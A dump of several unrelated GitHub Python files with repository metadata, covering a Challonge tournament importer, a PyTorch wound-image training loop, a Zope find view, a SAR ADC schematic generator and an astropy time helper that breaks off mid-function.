16d15c7c403e947cd7224a3ad6d98ea06966c65b | 3ccb61cf50e5d4c3263ae7e29d89ca4d2e761a5c | /command/refresh.py | 8167b6dc02f737f6b370e2e0745d1f08970b0ece | [] | no_license | K2Da/fgbuff | 6f29380276e90ddee35ed2734561cd53e05deb19 | d31e8423eebc763d2095d01e05b9adb1bef04c35 | refs/heads/master | 2021-01-11T03:20:08.170758 | 2017-03-04T12:31:29 | 2017-03-04T12:31:29 | 71,048,432 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,792 | py | import challonge
import config
from command.smash import SmashLoader
from database.common import Table
challonge.set_credentials(config.challonge_id, config.challonge_api_key)
ft = Table('fg_tournament')
for row in ft.select('refresh = %s', (True, )):
if row['source'] == 'smash':
l = SmashLoader(row)
l.import_data()
else:
t = challonge.tournaments.show(row['challo_url'])
cp = Table('challo_participant')
cp.delete('tournament_id = %s', (row['id'],))
participants = []
for p in challonge.participants.index(t['id']):
participants.append(p['id'])
cp.insert_with_array([p['id'], row['id'], p['name'], p['final-rank']])
cm = Table('challo_match')
cm.delete('tournament_id = %s', (row['id'],))
groups = {}
matches = challonge.matches.index(t['id'])
ids = []
for m in matches:
p1 = m['player1-id']
p2 = m['player2-id']
if p1 and p1 not in ids and p1 not in participants:
ids.append(p1)
if p2 and p2 not in ids and p2 not in participants:
ids.append(p2)
id_dictionary = dict(zip(sorted(ids), sorted(participants)))
for m in matches:
p1 = m['player1-id']
p2 = m['player2-id']
winner = m['winner-id']
group_id = m['group-id'] if m['group-id'] is not None else 0
r = m['round']
if group_id not in groups:
groups[group_id] = (r, r)
if r < groups[group_id][0]:
groups[group_id] = (r, groups[group_id][1])
if r > groups[group_id][1]:
groups[group_id] = (groups[group_id][0], r)
if p1 in id_dictionary:
p1 = id_dictionary[p1]
if p2 in id_dictionary:
p2 = id_dictionary[p2]
if winner in id_dictionary:
winner = id_dictionary[winner]
if winner is not None and int(winner) > 0:
cm.insert_with_array([
m['id'], row['id'], m['round'], p1, p2, winner, m['scores-csv'], group_id
])
cg = Table('challo_group')
cg.delete('tournament_id = %s', (row['id'],))
i = 65
for group_id, rounds in groups.items():
if group_id == 0:
name = 'Main Tournament'
else:
name = 'Group {0}'.format(chr(i))
i += 1
cg.insert_with_array([group_id if group_id is not None else 0, row['id'], rounds[0], rounds[1], name, 'DE'])
ft.update(row['id'], [('refresh', False), ('challo_id', t['id'])])
| [
"id.k2da@gmail.com"
] | id.k2da@gmail.com |
d0e4986d309250758c538a7565a37d494c0409a0 | e2df45a8594c5eb61aeda00cef07bb07b3bbec77 | /Gaussian_Naive_Bayes/read_data.py | 4e1faf755ae286f3a4acfbb98cf94fcfe1fe607a | [] | no_license | rathodx/Machine-Learning-from-Scratch | 8ccd67eb62320f5e235ba51e5d3e2c37e7465733 | 1f92d18fe7d73e8c95a3322dddbb5c6782ea1cf6 | refs/heads/master | 2021-01-01T14:21:41.452199 | 2019-05-21T06:44:07 | 2019-05-21T06:44:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 198 | py | import numpy as np
import h5py
def read_data(path):
f=h5py.File(path)
X=f['X']
Y=f['Y']
X = np.array(X, dtype='float64')/np.max(X)
Y = np.array(Y)
return X,Y
| [
"noreply@github.com"
] | noreply@github.com |
b674a0c5eebdf78362e1b76edcf44e210e286358 | a114b9b82ba5550d6c2b662d2c2594ee2772b6a8 | /train.py | 0487403b3b1055d5603c5c573dd008594360acf4 | [] | no_license | letter5j/wounds-image-classification | 78db45fbdd158f4e4ffa71d785a77e941f98205f | 4230b0ba3e6108a60f9e2a0a9842680deb828f29 | refs/heads/master | 2020-04-01T13:31:44.823423 | 2018-10-16T09:08:57 | 2018-10-16T09:08:57 | 153,256,220 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,984 | py | import torch
import torch.nn as nn
import torch.optim as optim
from torch.optim import lr_scheduler
from torch.autograd import Variable
import visdom
from get_data import get_data_loaders
import numpy as np
import time
import copy
import os
def train_model(model, criterion, optimizer, scheduler, num_epochs, dataloaders, dataset_sizes):
# By this way you should close the file directly:
PATH = os.path.abspath(os.path.dirname(__file__))
result_file = open(os.path.join(PATH, 'result', '%s.txt' %(model.name)), 'w+')
# result_file.writelines(text)
# result_file.close()
# By this way the file closed after the indented block after the with has finished execution:
# with open("filename.txt", "w") as fh:
# fh.write(text)
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
viz = visdom.Visdom()
#线图用来观察loss 和 accuracy
accuracy_line = viz.line(X=np.arange(1, 10, 1), Y=np.arange(1,10,1))
#线图用来观察loss 和 accuracy
loss_line = viz.line(X=np.arange(1, 10, 1), Y=np.arange(1,10,1))
#text 窗口用来显示loss 、accuracy 、时间
# text = viz.text("FOR TEST")
time_point, loss_point, accuracy_point = [], [], []
time_point_t, loss_point_t, accuracy_point_t = [], [], []
since = time.time()
best_model_wts = copy.deepcopy(model.state_dict())
best_acc = 0.0
for epoch in range(num_epochs):
print('Epoch {}/{}'.format(epoch, num_epochs - 1))
print('-' * 10)
result_file.writelines('Epoch {}/{}\n'.format(epoch, num_epochs - 1))
result_file.writelines('-' * 10 + '\n')
# Each epoch has a training and validation phase
for phase in ['train', 'test']:
if phase == 'train':
scheduler.step()
model.train() # Set model to training mode
else:
model.eval() # Set model to evaluate mode
running_loss = 0.0
running_corrects = 0
# Iterate over data.
for inputs, labels in dataloaders[phase]:
inputs = inputs.to(device)
labels = labels.to(device)
# zero the parameter gradients
optimizer.zero_grad()
# forward
# track history if only in train
with torch.set_grad_enabled(phase == 'train'):
outputs = model(inputs)
_, preds = torch.max(outputs, 1)
loss = criterion(outputs, labels)
# backward + optimize only if in training phase
if phase == 'train':
loss.backward()
optimizer.step()
# statistics
running_loss += loss.item() * inputs.size(0)
running_corrects += torch.sum(preds == labels.data)
epoch_loss = running_loss / dataset_sizes[phase]
epoch_acc = running_corrects.double() / dataset_sizes[phase]
print('{} Loss: {:.4f} Acc: {:.4f}'.format(
phase, epoch_loss, epoch_acc))
result_file.writelines('{} Loss: {:.4f} Acc: {:.4f}\n'.format(
phase, epoch_loss, epoch_acc))
if phase == 'train':
time_point.append(epoch)
loss_point.append(epoch_loss)
accuracy_point.append(epoch_acc)
if phase == 'test':
time_point_t.append(epoch)
loss_point_t.append(epoch_loss)
accuracy_point_t.append(epoch_acc)
# viz.text("<h3 align='center' style='color:blue'>accuracy : {}</h3><br><h3 align='center' style='color:pink'>"
# "loss : {:.4f}</h3><br><h3 align ='center' style='color:green'>time : {:.1f}</h3>"
# .format(epoch_acc,epoch_loss,time.time()-since),win =text)
# deep copy the model
if phase == 'test' and epoch_acc > best_acc:
best_acc = epoch_acc
best_model_wts = copy.deepcopy(model.state_dict())
viz.line(X=np.column_stack((np.array(time_point),np.array(time_point_t))),
Y=np.column_stack((np.array(accuracy_point),np.array(accuracy_point_t))),
win=accuracy_line,
opts=dict(title='%s-ac' %(model.name), legend=["accuracy", "test_accuracy"]))
viz.line(X=np.column_stack((np.array(time_point),np.array(time_point_t))),
Y=np.column_stack((np.array(loss_point),np.array(loss_point_t))),
win=loss_line,
opts=dict(title='%s-loss' %(model.name), legend=["loss", "test_loss"]))
time_elapsed = time.time() - since
print('Training complete in {:.0f}m {:.0f}s'.format(
time_elapsed // 60, time_elapsed % 60))
print('Best val Acc: {:4f}'.format(best_acc))
result_file.writelines('Training complete in {:.0f}m {:.0f}s\n'.format(
time_elapsed // 60, time_elapsed % 60))
result_file.writelines('Best val Acc: {:4f}\n'.format(best_acc))
# file close
result_file.close()
# load best model weights
model.load_state_dict(best_model_wts)
return model
def start_train(model):
dataloaders, dataset_sizes, class_names = get_data_loaders()
criterion = nn.CrossEntropyLoss()
# Observe that only parameters of final layer are being optimized as
# opoosed to before.
optimizer_conv = optim.Adam(model.classifier.parameters(), lr=0.01)
# Decay LR by a factor of 0.1 every 7 epochs
exp_lr_scheduler = lr_scheduler.StepLR(optimizer_conv, step_size=7, gamma=0.01)
model = train_model(model, criterion, optimizer_conv, exp_lr_scheduler, 20, dataloaders, dataset_sizes)
PATH = os.path.abspath(os.path.dirname(__file__))
torch.save(model.state_dict(), os.path.join(PATH, 'pretrained_model', '%s.pth' %(model.name)))
return model | [
"seanletter5j@Gmail.com"
] | seanletter5j@Gmail.com |
005852383cf1e3ae176206e5dd95e2754cd001ce | 006341ca12525aa0979d6101600e78c4bd9532ab | /CMS/Zope-3.2.1/Dependencies/zope.app-Zope-3.2.1/zope.app/container/browser/find.py | ee744f8239d12401177ed371c83a4a3a56c523fe | [
"ZPL-2.1",
"Python-2.0",
"ICU",
"LicenseRef-scancode-public-domain",
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference",
"ZPL-2.0"
] | permissive | germanfriday/code-examples-sandbox | d0f29e20a3eed1f8430d06441ac2d33bac5e4253 | 4c538584703754c956ca66392fdcecf0a0ca2314 | refs/heads/main | 2023-05-30T22:21:57.918503 | 2021-06-15T15:06:47 | 2021-06-15T15:06:47 | 377,200,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,567 | py | ##############################################################################
#
# Copyright (c) 2001, 2002 Zope Corporation and Contributors.
# All Rights Reserved.
#
# This software is subject to the provisions of the Zope Public License,
# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY AND ALL EXPRESS OR IMPLIED
# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS
# FOR A PARTICULAR PURPOSE.
#
##############################################################################
"""Find View Class
$Id: find.py 29143 2005-02-14 22:43:16Z srichter $
"""
__docformat__ = 'restructuredtext'
from zope.app import zapi
from zope.app.container.find import SimpleIdFindFilter
from zope.app.container.interfaces import IFind
from zope.app.traversing.api import getName
from zope.app.publisher.browser import BrowserView
# Very simple implementation right now
class Find(BrowserView):
def findByIds(self, ids):
"""Do a find for the `ids` listed in `ids`, which is a string."""
finder = IFind(self.context)
ids = ids.split()
# if we don't have any ids listed, don't search at all
if not ids:
return []
request = self.request
result = []
for object in finder.find([SimpleIdFindFilter(ids)]):
url = zapi.absoluteURL(object, request)
result.append({ 'id': getName(object), 'url': url})
return result
| [
"chris@thegermanfriday.com"
] | chris@thegermanfriday.com |
970feb65038f3cbb7891e048c6ec4edf3da55f5c | 27cd4886e5d08cca23bf36e24339ff1155b7db10 | /generators/adc_sar/BagModules/adc_sar_templates/TISARADC.py | 3397c883b0f4ee6cc3c04f5671d08c84f7ffb9ab | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | ucb-art/laygo | 8539accac6e9888122e8e0afd160d294ffb56bfc | 8f62ec1971480cb27cb592421fd97f590379cff9 | refs/heads/master | 2021-01-11T08:49:24.306674 | 2020-06-18T15:01:50 | 2020-06-18T15:01:50 | 194,750,788 | 24 | 9 | null | null | null | null | UTF-8 | Python | false | false | 19,542 | py | # -*- coding: utf-8 -*-
########################################################################################################################
#
# Copyright (c) 2014, Regents of the University of California
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
# following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
# disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
# following disclaimer in the documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
########################################################################################################################
from __future__ import (absolute_import, division,
print_function, unicode_literals)
# noinspection PyUnresolvedReferences,PyCompatibility
from builtins import *
import os
import pkg_resources
from bag.design import Module
yaml_file = pkg_resources.resource_filename(__name__, os.path.join('netlist_info', 'TISARADC.yaml'))
# noinspection PyPep8Naming
class adc_sar_templates__TISARADC(Module):
"""Module for library adc_sar_templates cell TISARADC.
Fill in high level description here.
"""
def __init__(self, bag_config, parent=None, prj=None, **kwargs):
Module.__init__(self, bag_config, yaml_file, parent=parent, prj=prj, **kwargs)
def design(self,
sar_lch,
sar_pw,
sar_nw,
sar_sa_m, sar_sa_m_d,
sar_sa_m_rst, sar_sa_m_rst_d,
sar_sa_m_rgnn, sar_sa_m_rgnp_d,
sar_sa_m_buf, doubleSA, sar_sa_m_smallrgnp,
vref_sf_m_mirror, vref_sf_m_bias, vref_sf_m_off, vref_sf_m_in, vref_sf_m_bias_dum, vref_sf_m_in_dum,
vref_sf_m_byp, vref_sf_m_byp_bias, vref_sf_bias_current, vref_sf,
sar_drv_m_list, sar_ckgen_m, sar_ckgen_fo,
sar_ckgen_ndelay, sar_ckgen_fast, sar_ckgen_muxfast,
sar_logic_m,
sar_fsm_m,
sar_ret_m,
sar_ret_fo,
sar_device_intent,
sar_c_m,
sar_rdx_array, sar_num_inv_bb,
samp_lch,
samp_wp,
samp_wn,
samp_fgn,
samp_fg_inbuf_list,
samp_fg_outbuf_list,
samp_nduml,
samp_ndumr,
samp_nsep,
samp_intent,
num_bits,
samp_use_laygo, samp_tgate,
sf_lch, sf_nw, sf_m_mirror, sf_m_bias, sf_m_off, sf_m_in, sf_m_bias_dum, sf_m_in_dum, sf_m_byp,
sf_m_byp_bias, sf_intent, bias_current, use_sf,
use_offset, num_slices,
clk_lch,
clk_pw,
clk_nw,
clk_cdac_bits,
clk_m_dff,
clk_m_inv1,
clk_m_inv2,
clk_m_tgate,
clk_n_pd,
clk_m_capsw,
clk_unit_cell,
clk_device_intent,
clk_pulse,
ret_lch,
ret_pw,
ret_nw,
ret_m_ibuf,
ret_m_obuf,
ret_m_latch,
ret_m_srbuf,
ret_m_sr,
ret_device_intent,
input_htree,
generate_dac,
space_msamp,
space_msar,
space_mdecap,
rdac_lch, rdac_pw, rdac_nw, rdac_m, rdac_m_bcap, rdac_num_series, rdac_num_bits, rdac_num_dacs, rdac_device_intent
):
"""To be overridden by subclasses to design this module.
This method should fill in values for all parameters in
self.parameters. To design instances of this module, you can
call their design() method or any other ways you coded.
To modify schematic structure, call:
rename_pin()
delete_instance()
replace_instance_master()
reconnect_instance_terminal()
restore_instance()
array_instance()
"""
self.parameters['sar_lch'] = sar_lch
self.parameters['sar_pw'] = sar_pw
self.parameters['sar_nw'] = sar_nw
self.parameters['sar_sa_m'] = sar_sa_m
self.parameters['sar_sa_m_d'] = sar_sa_m_d
self.parameters['sar_sa_m_rst'] = sar_sa_m_rst
self.parameters['sar_sa_m_rst_d'] = sar_sa_m_rst
self.parameters['sar_sa_m_rgnn'] = sar_sa_m_rgnn
self.parameters['sar_sa_m_rgnp_d'] = sar_sa_m_rgnp_d
self.parameters['sar_sa_m_buf'] = sar_sa_m_buf
self.parameters['doubleSA'] = doubleSA
self.parameters['sar_sa_m_smallrgnp'] = sar_sa_m_smallrgnp
self.parameters['vref_sf_m_mirror'] = vref_sf_m_mirror
self.parameters['vref_sf_m_bias'] = vref_sf_m_bias
self.parameters['vref_sf_m_in'] = vref_sf_m_in
self.parameters['vref_sf_m_off'] = vref_sf_m_off
self.parameters['vref_sf_m_bias_dum'] = vref_sf_m_bias_dum
self.parameters['vref_sf_m_in_dum'] = vref_sf_m_in_dum
self.parameters['vref_sf_m_byp'] = vref_sf_m_byp
self.parameters['vref_sf_m_byp_bias'] = vref_sf_m_byp_bias
self.parameters['vref_sf_bias_current'] = vref_sf_bias_current
self.parameters['vref_sf'] = vref_sf
self.parameters['sar_drv_m_list'] = sar_drv_m_list
self.parameters['sar_ckgen_m'] = sar_ckgen_m
self.parameters['sar_ckgen_fo'] = sar_ckgen_fo
self.parameters['sar_ckgen_ndelay'] = sar_ckgen_ndelay
self.parameters['sar_ckgen_fast'] = sar_ckgen_fast
self.parameters['sar_ckgen_muxfast'] = sar_ckgen_muxfast
self.parameters['sar_logic_m'] = sar_logic_m
self.parameters['sar_fsm_m'] = sar_fsm_m
self.parameters['sar_ret_m'] = sar_ret_m
self.parameters['sar_ret_fo'] = sar_ret_fo
self.parameters['sar_num_inv_bb'] = sar_num_inv_bb
self.parameters['sar_device_intent'] = sar_device_intent
self.parameters['sar_c_m'] = sar_c_m
self.parameters['sar_rdx_array'] = sar_rdx_array
self.parameters['samp_lch'] = samp_lch
self.parameters['samp_wp'] = samp_wp
self.parameters['samp_wn'] = samp_wn
self.parameters['samp_fgn'] = samp_fgn
self.parameters['samp_fg_inbuf_list'] = samp_fg_inbuf_list
self.parameters['samp_fg_outbuf_list'] = samp_fg_outbuf_list
self.parameters['samp_nduml'] = samp_nduml
self.parameters['samp_ndumr'] = samp_ndumr
self.parameters['samp_nsep'] = samp_nsep
self.parameters['samp_intent'] = samp_intent
self.parameters['num_bits'] = num_bits
self.parameters['samp_tgate'] = samp_tgate
self.parameters['samp_use_laygo'] = samp_use_laygo # if true, use laygo for sampler generation
self.parameters['sf_lch'] = sf_lch
self.parameters['sf_nw'] = sf_nw
self.parameters['sf_m_mirror'] = sf_m_mirror
self.parameters['sf_m_bias'] = sf_m_bias
self.parameters['sf_m_in'] = sf_m_in
self.parameters['sf_m_off'] = sf_m_off
self.parameters['sf_m_bias_dum'] = sf_m_bias_dum
self.parameters['sf_m_in_dum'] = sf_m_in_dum
self.parameters['sf_m_byp'] = sf_m_byp
self.parameters['sf_m_byp_bias'] = sf_m_byp_bias
self.parameters['sf_intent'] = sf_intent
self.parameters['use_offset'] = use_offset
self.parameters['num_slices'] = num_slices
self.parameters['clk_lch'] = clk_lch
self.parameters['clk_pw'] = clk_pw
self.parameters['clk_nw'] = clk_nw
self.parameters['clk_cdac_bits'] = clk_cdac_bits
self.parameters['clk_m_dff'] = clk_m_dff
self.parameters['clk_m_inv1'] = clk_m_inv1
self.parameters['clk_m_inv2'] = clk_m_inv2
self.parameters['clk_m_tgate'] = clk_m_tgate
self.parameters['clk_n_pd'] = clk_n_pd
self.parameters['clk_m_capsw'] = clk_m_capsw
self.parameters['clk_unit_cell'] = clk_unit_cell
self.parameters['clk_device_intent'] = clk_device_intent
self.parameters['ret_lch'] = ret_lch
self.parameters['ret_pw'] = ret_pw
self.parameters['ret_nw'] = ret_nw
self.parameters['ret_m_ibuf'] = ret_m_ibuf
self.parameters['ret_m_obuf'] = ret_m_obuf
self.parameters['ret_m_latch'] = ret_m_latch
self.parameters['ret_device_intent'] = ret_device_intent
self.parameters['input_htree'] = input_htree
self.parameters['generate_dac'] = generate_dac
self.parameters['space_msamp'] = space_msamp
self.parameters['space_msar'] = space_msar
self.parameters['space_mdecap'] = space_mdecap
self.parameters['rdac_lch'] = rdac_lch
self.parameters['rdac_pw'] = rdac_pw
self.parameters['rdac_nw'] = rdac_nw
self.parameters['rdac_m'] = rdac_m
self.parameters['rdac_m_bcap'] = rdac_m_bcap
self.parameters['rdac_num_series'] = rdac_num_series
self.parameters['rdac_num_bits'] = rdac_num_bits
self.parameters['rdac_num_dacs'] = rdac_num_dacs
self.parameters['rdac_device_intent'] = rdac_device_intent
# tisaradc_body
if use_sf == True and vref_sf == True:
term_list = [{
','.join(['INP%d' % (i) for i in range(num_slices)]): 'INP',
','.join(['INM%d' % (i) for i in range(num_slices)]): 'INM',
','.join(['OSP%d' % (i) for i in range(num_slices)]):
','.join(['OSP%d' % (i) for i in range(num_slices)]),
','.join(['OSM%d' % (i) for i in range(num_slices)]):
','.join(['OSM%d' % (i) for i in range(num_slices)]),
','.join(['ASCLKD%d<3:0>' % (i) for i in range(num_slices)]):
','.join(['ASCLKD%d<3:0>' % (i) for i in range(num_slices)]),
','.join(['EXTSEL_CLK%d' % (i) for i in range(num_slices)]):
','.join(['EXTSEL_CLK%d' % (i) for i in range(num_slices)]),
','.join(['MODESEL%d' % (i) for i in range(num_slices)]):
','.join(['MODESEL%d' % (i) for i in range(num_slices)]),
','.join(['CLKCAL%d<4:0>' % i for i in range(num_slices)]):
','.join(['CLKCAL%d<4:0>' % i for i in range(num_slices)]),
','.join(['ADCOUT%d<%d:0>' % (i, num_bits - 1) for i in range(num_slices)]):
','.join(['ADCOUT%d<%d:0>' % (i, num_bits - 1) for i in range(num_slices)]),
','.join(['SF_Voffp%d' % (i) for i in range(num_slices)]):
'RDAC_OUT<0:%d>'%(num_slices-1),
','.join(['SF_Voffn%d' % (i) for i in range(num_slices)]):
'RDAC_OUT<%d:%d>' % ((num_slices), (num_slices*2 - 1)),
','.join(['SF_BIAS%d' % (i) for i in range(num_slices)]):
'RDAC_OUT<%d>' % (num_slices * 2),
','.join(['VREF_SF_BIAS%d' % (i) for i in range(num_slices)]):
'RDAC_OUT<%d>' % (rdac_num_dacs-1),
}]
elif use_offset == True:
term_list = [{
','.join(['INP%d' % (i) for i in range(num_slices)]): 'INP',
','.join(['INM%d' % (i) for i in range(num_slices)]): 'INM',
','.join(['OSP%d' % (i) for i in range(num_slices)]):
'RDAC_OUT<0:%d>'%(num_slices-1),
','.join(['OSM%d' % (i) for i in range(num_slices)]):
'RDAC_OUT<%d:%d>' % ((num_slices), (num_slices*2 - 1)),
','.join(['ASCLKD%d<3:0>' % (i) for i in range(num_slices)]):
','.join(['ASCLKD%d<3:0>' % (i) for i in range(num_slices)]),
','.join(['EXTSEL_CLK%d' % (i) for i in range(num_slices)]):
','.join(['EXTSEL_CLK%d' % (i) for i in range(num_slices)]),
','.join(['MODESEL%d' % (i) for i in range(num_slices)]):
','.join(['MODESEL%d' % (i) for i in range(num_slices)]),
','.join(['CLKCAL%d<4:0>' % i for i in range(num_slices)]):
','.join(['CLKCAL%d<4:0>' % i for i in range(num_slices)]),
','.join(['ADCOUT%d<%d:0>' % (i, num_bits - 1) for i in range(num_slices)]):
','.join(['ADCOUT%d<%d:0>' % (i, num_bits - 1) for i in range(num_slices)]),
}]
elif use_offset == False:
term_list = [{
','.join(['INP%d' % (i) for i in range(num_slices)]): 'INP',
','.join(['INM%d' % (i) for i in range(num_slices)]): 'INM',
','.join(['ASCLKD%d<3:0>' % (i) for i in range(num_slices)]):
','.join(['ASCLKD%d<3:0>' % (i) for i in range(num_slices)]),
','.join(['EXTSEL_CLK%d' % (i) for i in range(num_slices)]):
','.join(['EXTSEL_CLK%d' % (i) for i in range(num_slices)]),
','.join(['MODESEL%d' % (i) for i in range(num_slices)]):
','.join(['MODESEL%d' % (i) for i in range(num_slices)]),
','.join(['CLKCAL%d<4:0>' % i for i in range(num_slices)]):
','.join(['CLKCAL%d<4:0>' % i for i in range(num_slices)]),
','.join(['ADCOUT%d<%d:0>' % (i, num_bits - 1) for i in range(num_slices)]):
','.join(['ADCOUT%d<%d:0>' % (i, num_bits - 1) for i in range(num_slices)]),
}]
name_list=(['ISAR'])
self.array_instance('ISAR', name_list, term_list=term_list)
self.instances['ISAR'][0].design(
sar_lch,
sar_pw,
sar_nw,
sar_sa_m, sar_sa_m_d,
sar_sa_m_rst, sar_sa_m_rst_d,
sar_sa_m_rgnn, sar_sa_m_rgnp_d,
sar_sa_m_buf, doubleSA, sar_sa_m_smallrgnp,
vref_sf_m_mirror, vref_sf_m_bias, vref_sf_m_off, vref_sf_m_in, vref_sf_m_bias_dum, vref_sf_m_in_dum,
vref_sf_m_byp, vref_sf_m_byp_bias, vref_sf_bias_current, vref_sf,
sar_drv_m_list, sar_ckgen_m, sar_ckgen_fo,
sar_ckgen_ndelay, sar_ckgen_fast, sar_ckgen_muxfast,
sar_logic_m,
sar_fsm_m,
sar_ret_m,
sar_ret_fo,
sar_device_intent,
sar_c_m,
sar_rdx_array, sar_num_inv_bb,
samp_lch,
samp_wp,
samp_wn,
samp_fgn,
samp_fg_inbuf_list,
samp_fg_outbuf_list,
samp_nduml,
samp_ndumr,
samp_nsep,
samp_intent,
num_bits,
samp_use_laygo, samp_tgate,
sf_lch, sf_nw, sf_m_mirror, sf_m_bias, sf_m_off, sf_m_in, sf_m_bias_dum, sf_m_in_dum, sf_m_byp,
sf_m_byp_bias, sf_intent, bias_current, use_sf,
use_offset, num_slices,
clk_lch,
clk_pw,
clk_nw,
clk_cdac_bits,
clk_m_dff,
clk_m_inv1,
clk_m_inv2,
clk_m_tgate,
clk_n_pd,
clk_m_capsw,
clk_unit_cell,
clk_device_intent,
clk_pulse,
ret_lch,
ret_pw,
ret_nw,
ret_m_ibuf,
ret_m_obuf,
ret_m_latch,
ret_m_srbuf,
ret_m_sr,
ret_device_intent,
input_htree,
space_msamp,
space_msar,
space_mdecap,
)
# RDAC generation
if generate_dac:
self.instances['IRDAC'].design(rdac_lch, rdac_pw, rdac_nw, rdac_m, rdac_m_bcap, rdac_num_series,
rdac_num_bits, rdac_num_dacs, rdac_device_intent)
self.reconnect_instance_terminal(inst_name='IRDAC', term_name='out<%d:0>'%(rdac_num_dacs-1),
net_name='RDAC_OUT<%d:0>'%(rdac_num_dacs-1))
self.reconnect_instance_terminal(inst_name='IRDAC', term_name='SEL<%d:0>'%(rdac_num_dacs*rdac_num_bits-1),
net_name='RDAC_SEL<%d:0>'%(rdac_num_dacs*rdac_num_bits-1))
self.rename_pin('RDAC_SEL', 'RDAC_SEL<%d:0>'%(rdac_num_dacs*rdac_num_bits-1))
else:
self.delete_instance('IRDAC')
self.rename_pin('RDAC_SEL', 'RDAC_OUT<%d:0>'%(rdac_num_dacs-1))
self.rename_pin('CLKCAL', ','.join(['CLKCAL%d<4:0>'%i for i in range(num_slices)]))
self.rename_pin('ASCLKD<3:0>', ','.join(['ASCLKD%d<3:0>'%(i) for i in range(num_slices)]))
self.rename_pin('EXTSEL_CLK', ','.join(['EXTSEL_CLK%d'%(i) for i in range(num_slices)]))
self.rename_pin('ADCOUT', ','.join(['ADCOUT%d<%d:0>'%(i, num_bits-1) for i in range(num_slices)]))
if sar_ckgen_muxfast == True:
self.rename_pin('MODESEL', ','.join(['MODESEL%d'%(i) for i in range(num_slices)]))
else:
self.remove_pin('MODESEL')
if vref_sf == False:
self.remove_pin('VREF_SF_bypass')
#self.remove_pin(','.join(['VREF_SF_BIAS%d' % (i) for i in range(num_slices)]))
if use_sf == False:
self.remove_pin('SF_bypass')
#self.remove_pin(','.join(['SF_BIAS%d' % (i) for i in range(num_slices)]))
#self.remove_pin(','.join(['SF_Voffp%d' % (i) for i in range(num_slices)]))
#self.remove_pin(','.join(['SF_Voffn%d' % (i) for i in range(num_slices)]))
def get_layout_params(self, **kwargs):
"""Returns a dictionary with layout parameters.
This method computes the layout parameters used to generate implementation's
layout. Subclasses should override this method if you need to run post-extraction
layout.
Parameters
----------
kwargs :
any extra parameters you need to generate the layout parameters dictionary.
Usually you specify layout-specific parameters here, like metal layers of
input/output, customizable wire sizes, and so on.
Returns
-------
params : dict[str, any]
the layout parameters dictionary.
"""
return {}
def get_layout_pin_mapping(self):
"""Returns the layout pin mapping dictionary.
This method returns a dictionary used to rename the layout pins, in case they are different
than the schematic pins.
Returns
-------
pin_mapping : dict[str, str]
a dictionary from layout pin names to schematic pin names.
"""
return {}
| [
"richards@eecs.berkeley.edu"
] | richards@eecs.berkeley.edu |
de1807a8bc122d70b558be8cdb65dc46b9c1369c | 5e2473a8b164b0aa8c7f9316cc5371c7dbb4a8d3 | /Code/ephem.py | f146c1d6ea5db2e8b3e5ae1278d2d73dfd4d20eb | [] | no_license | agagnebin/Drift_Rate_Analysis | e108a6d9e315606eaf34feedbf952695a3db00c1 | 917eb7ff3327734dcd8ac0b03e8d0c1c38369117 | refs/heads/main | 2023-07-06T06:23:07.302949 | 2021-08-20T22:08:43 | 2021-08-20T22:08:43 | 393,111,993 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,248 | py | from astropy import units as u
from astropy.coordinates import Angle, SkyCoord
import numpy as np
#import dateutil
from astropy.convolution import convolve, Gaussian1DKernel
from astropy import constants as Const
from argparse import Namespace
def to_Angle(val, unit='degree'):
if isinstance(val, (u.quantity.Quantity, Angle)):
return val
return Angle(val, unit)
#def to_Time(times, toffset=None):
# """Convert to Time."""
def to_Time(times, toffset = None):
"""Convert to Time."""
if dates is None or dates is False:
return None
if isinstance(dates, list) or isinstance(times, (list, ndarray)):
if isinstance(times, ndarray):
times = list(times)
if not isinstance(times, list):
times = [times] * len(dates)
if not isinstance(dates, list):
dates = [dates] * len(times)
if len(dates) != len(times):
raise ValueError("dates/times list lengths must match.")
return_Time = []
if len(dates) > 1000:
print("Converting {} time entries - could take a moment.".format(len(dates)))
for _date, _time in zip(dates, times):
return_Time.append(get_astropytime(_date, _time))
return Time(return_Time)
if isinstance(dates, str):
if dates.lower() == 'none':
return None
if dates == '<':
return Time('2000-01-01', scale='utc')
if dates == '>':
return Time.now() + TimeDelta(1000, format='jd')
if dates.lower() == 'now' or dates.lower() == 'current':
return Time.now()
if isinstance(dates, Time):
return_Time = dates
elif isinstance(dates, datetime):
return_Time = Time(dates, format='datetime')
else:
try:
dates = float(dates)
if dates > 1000000000.0:
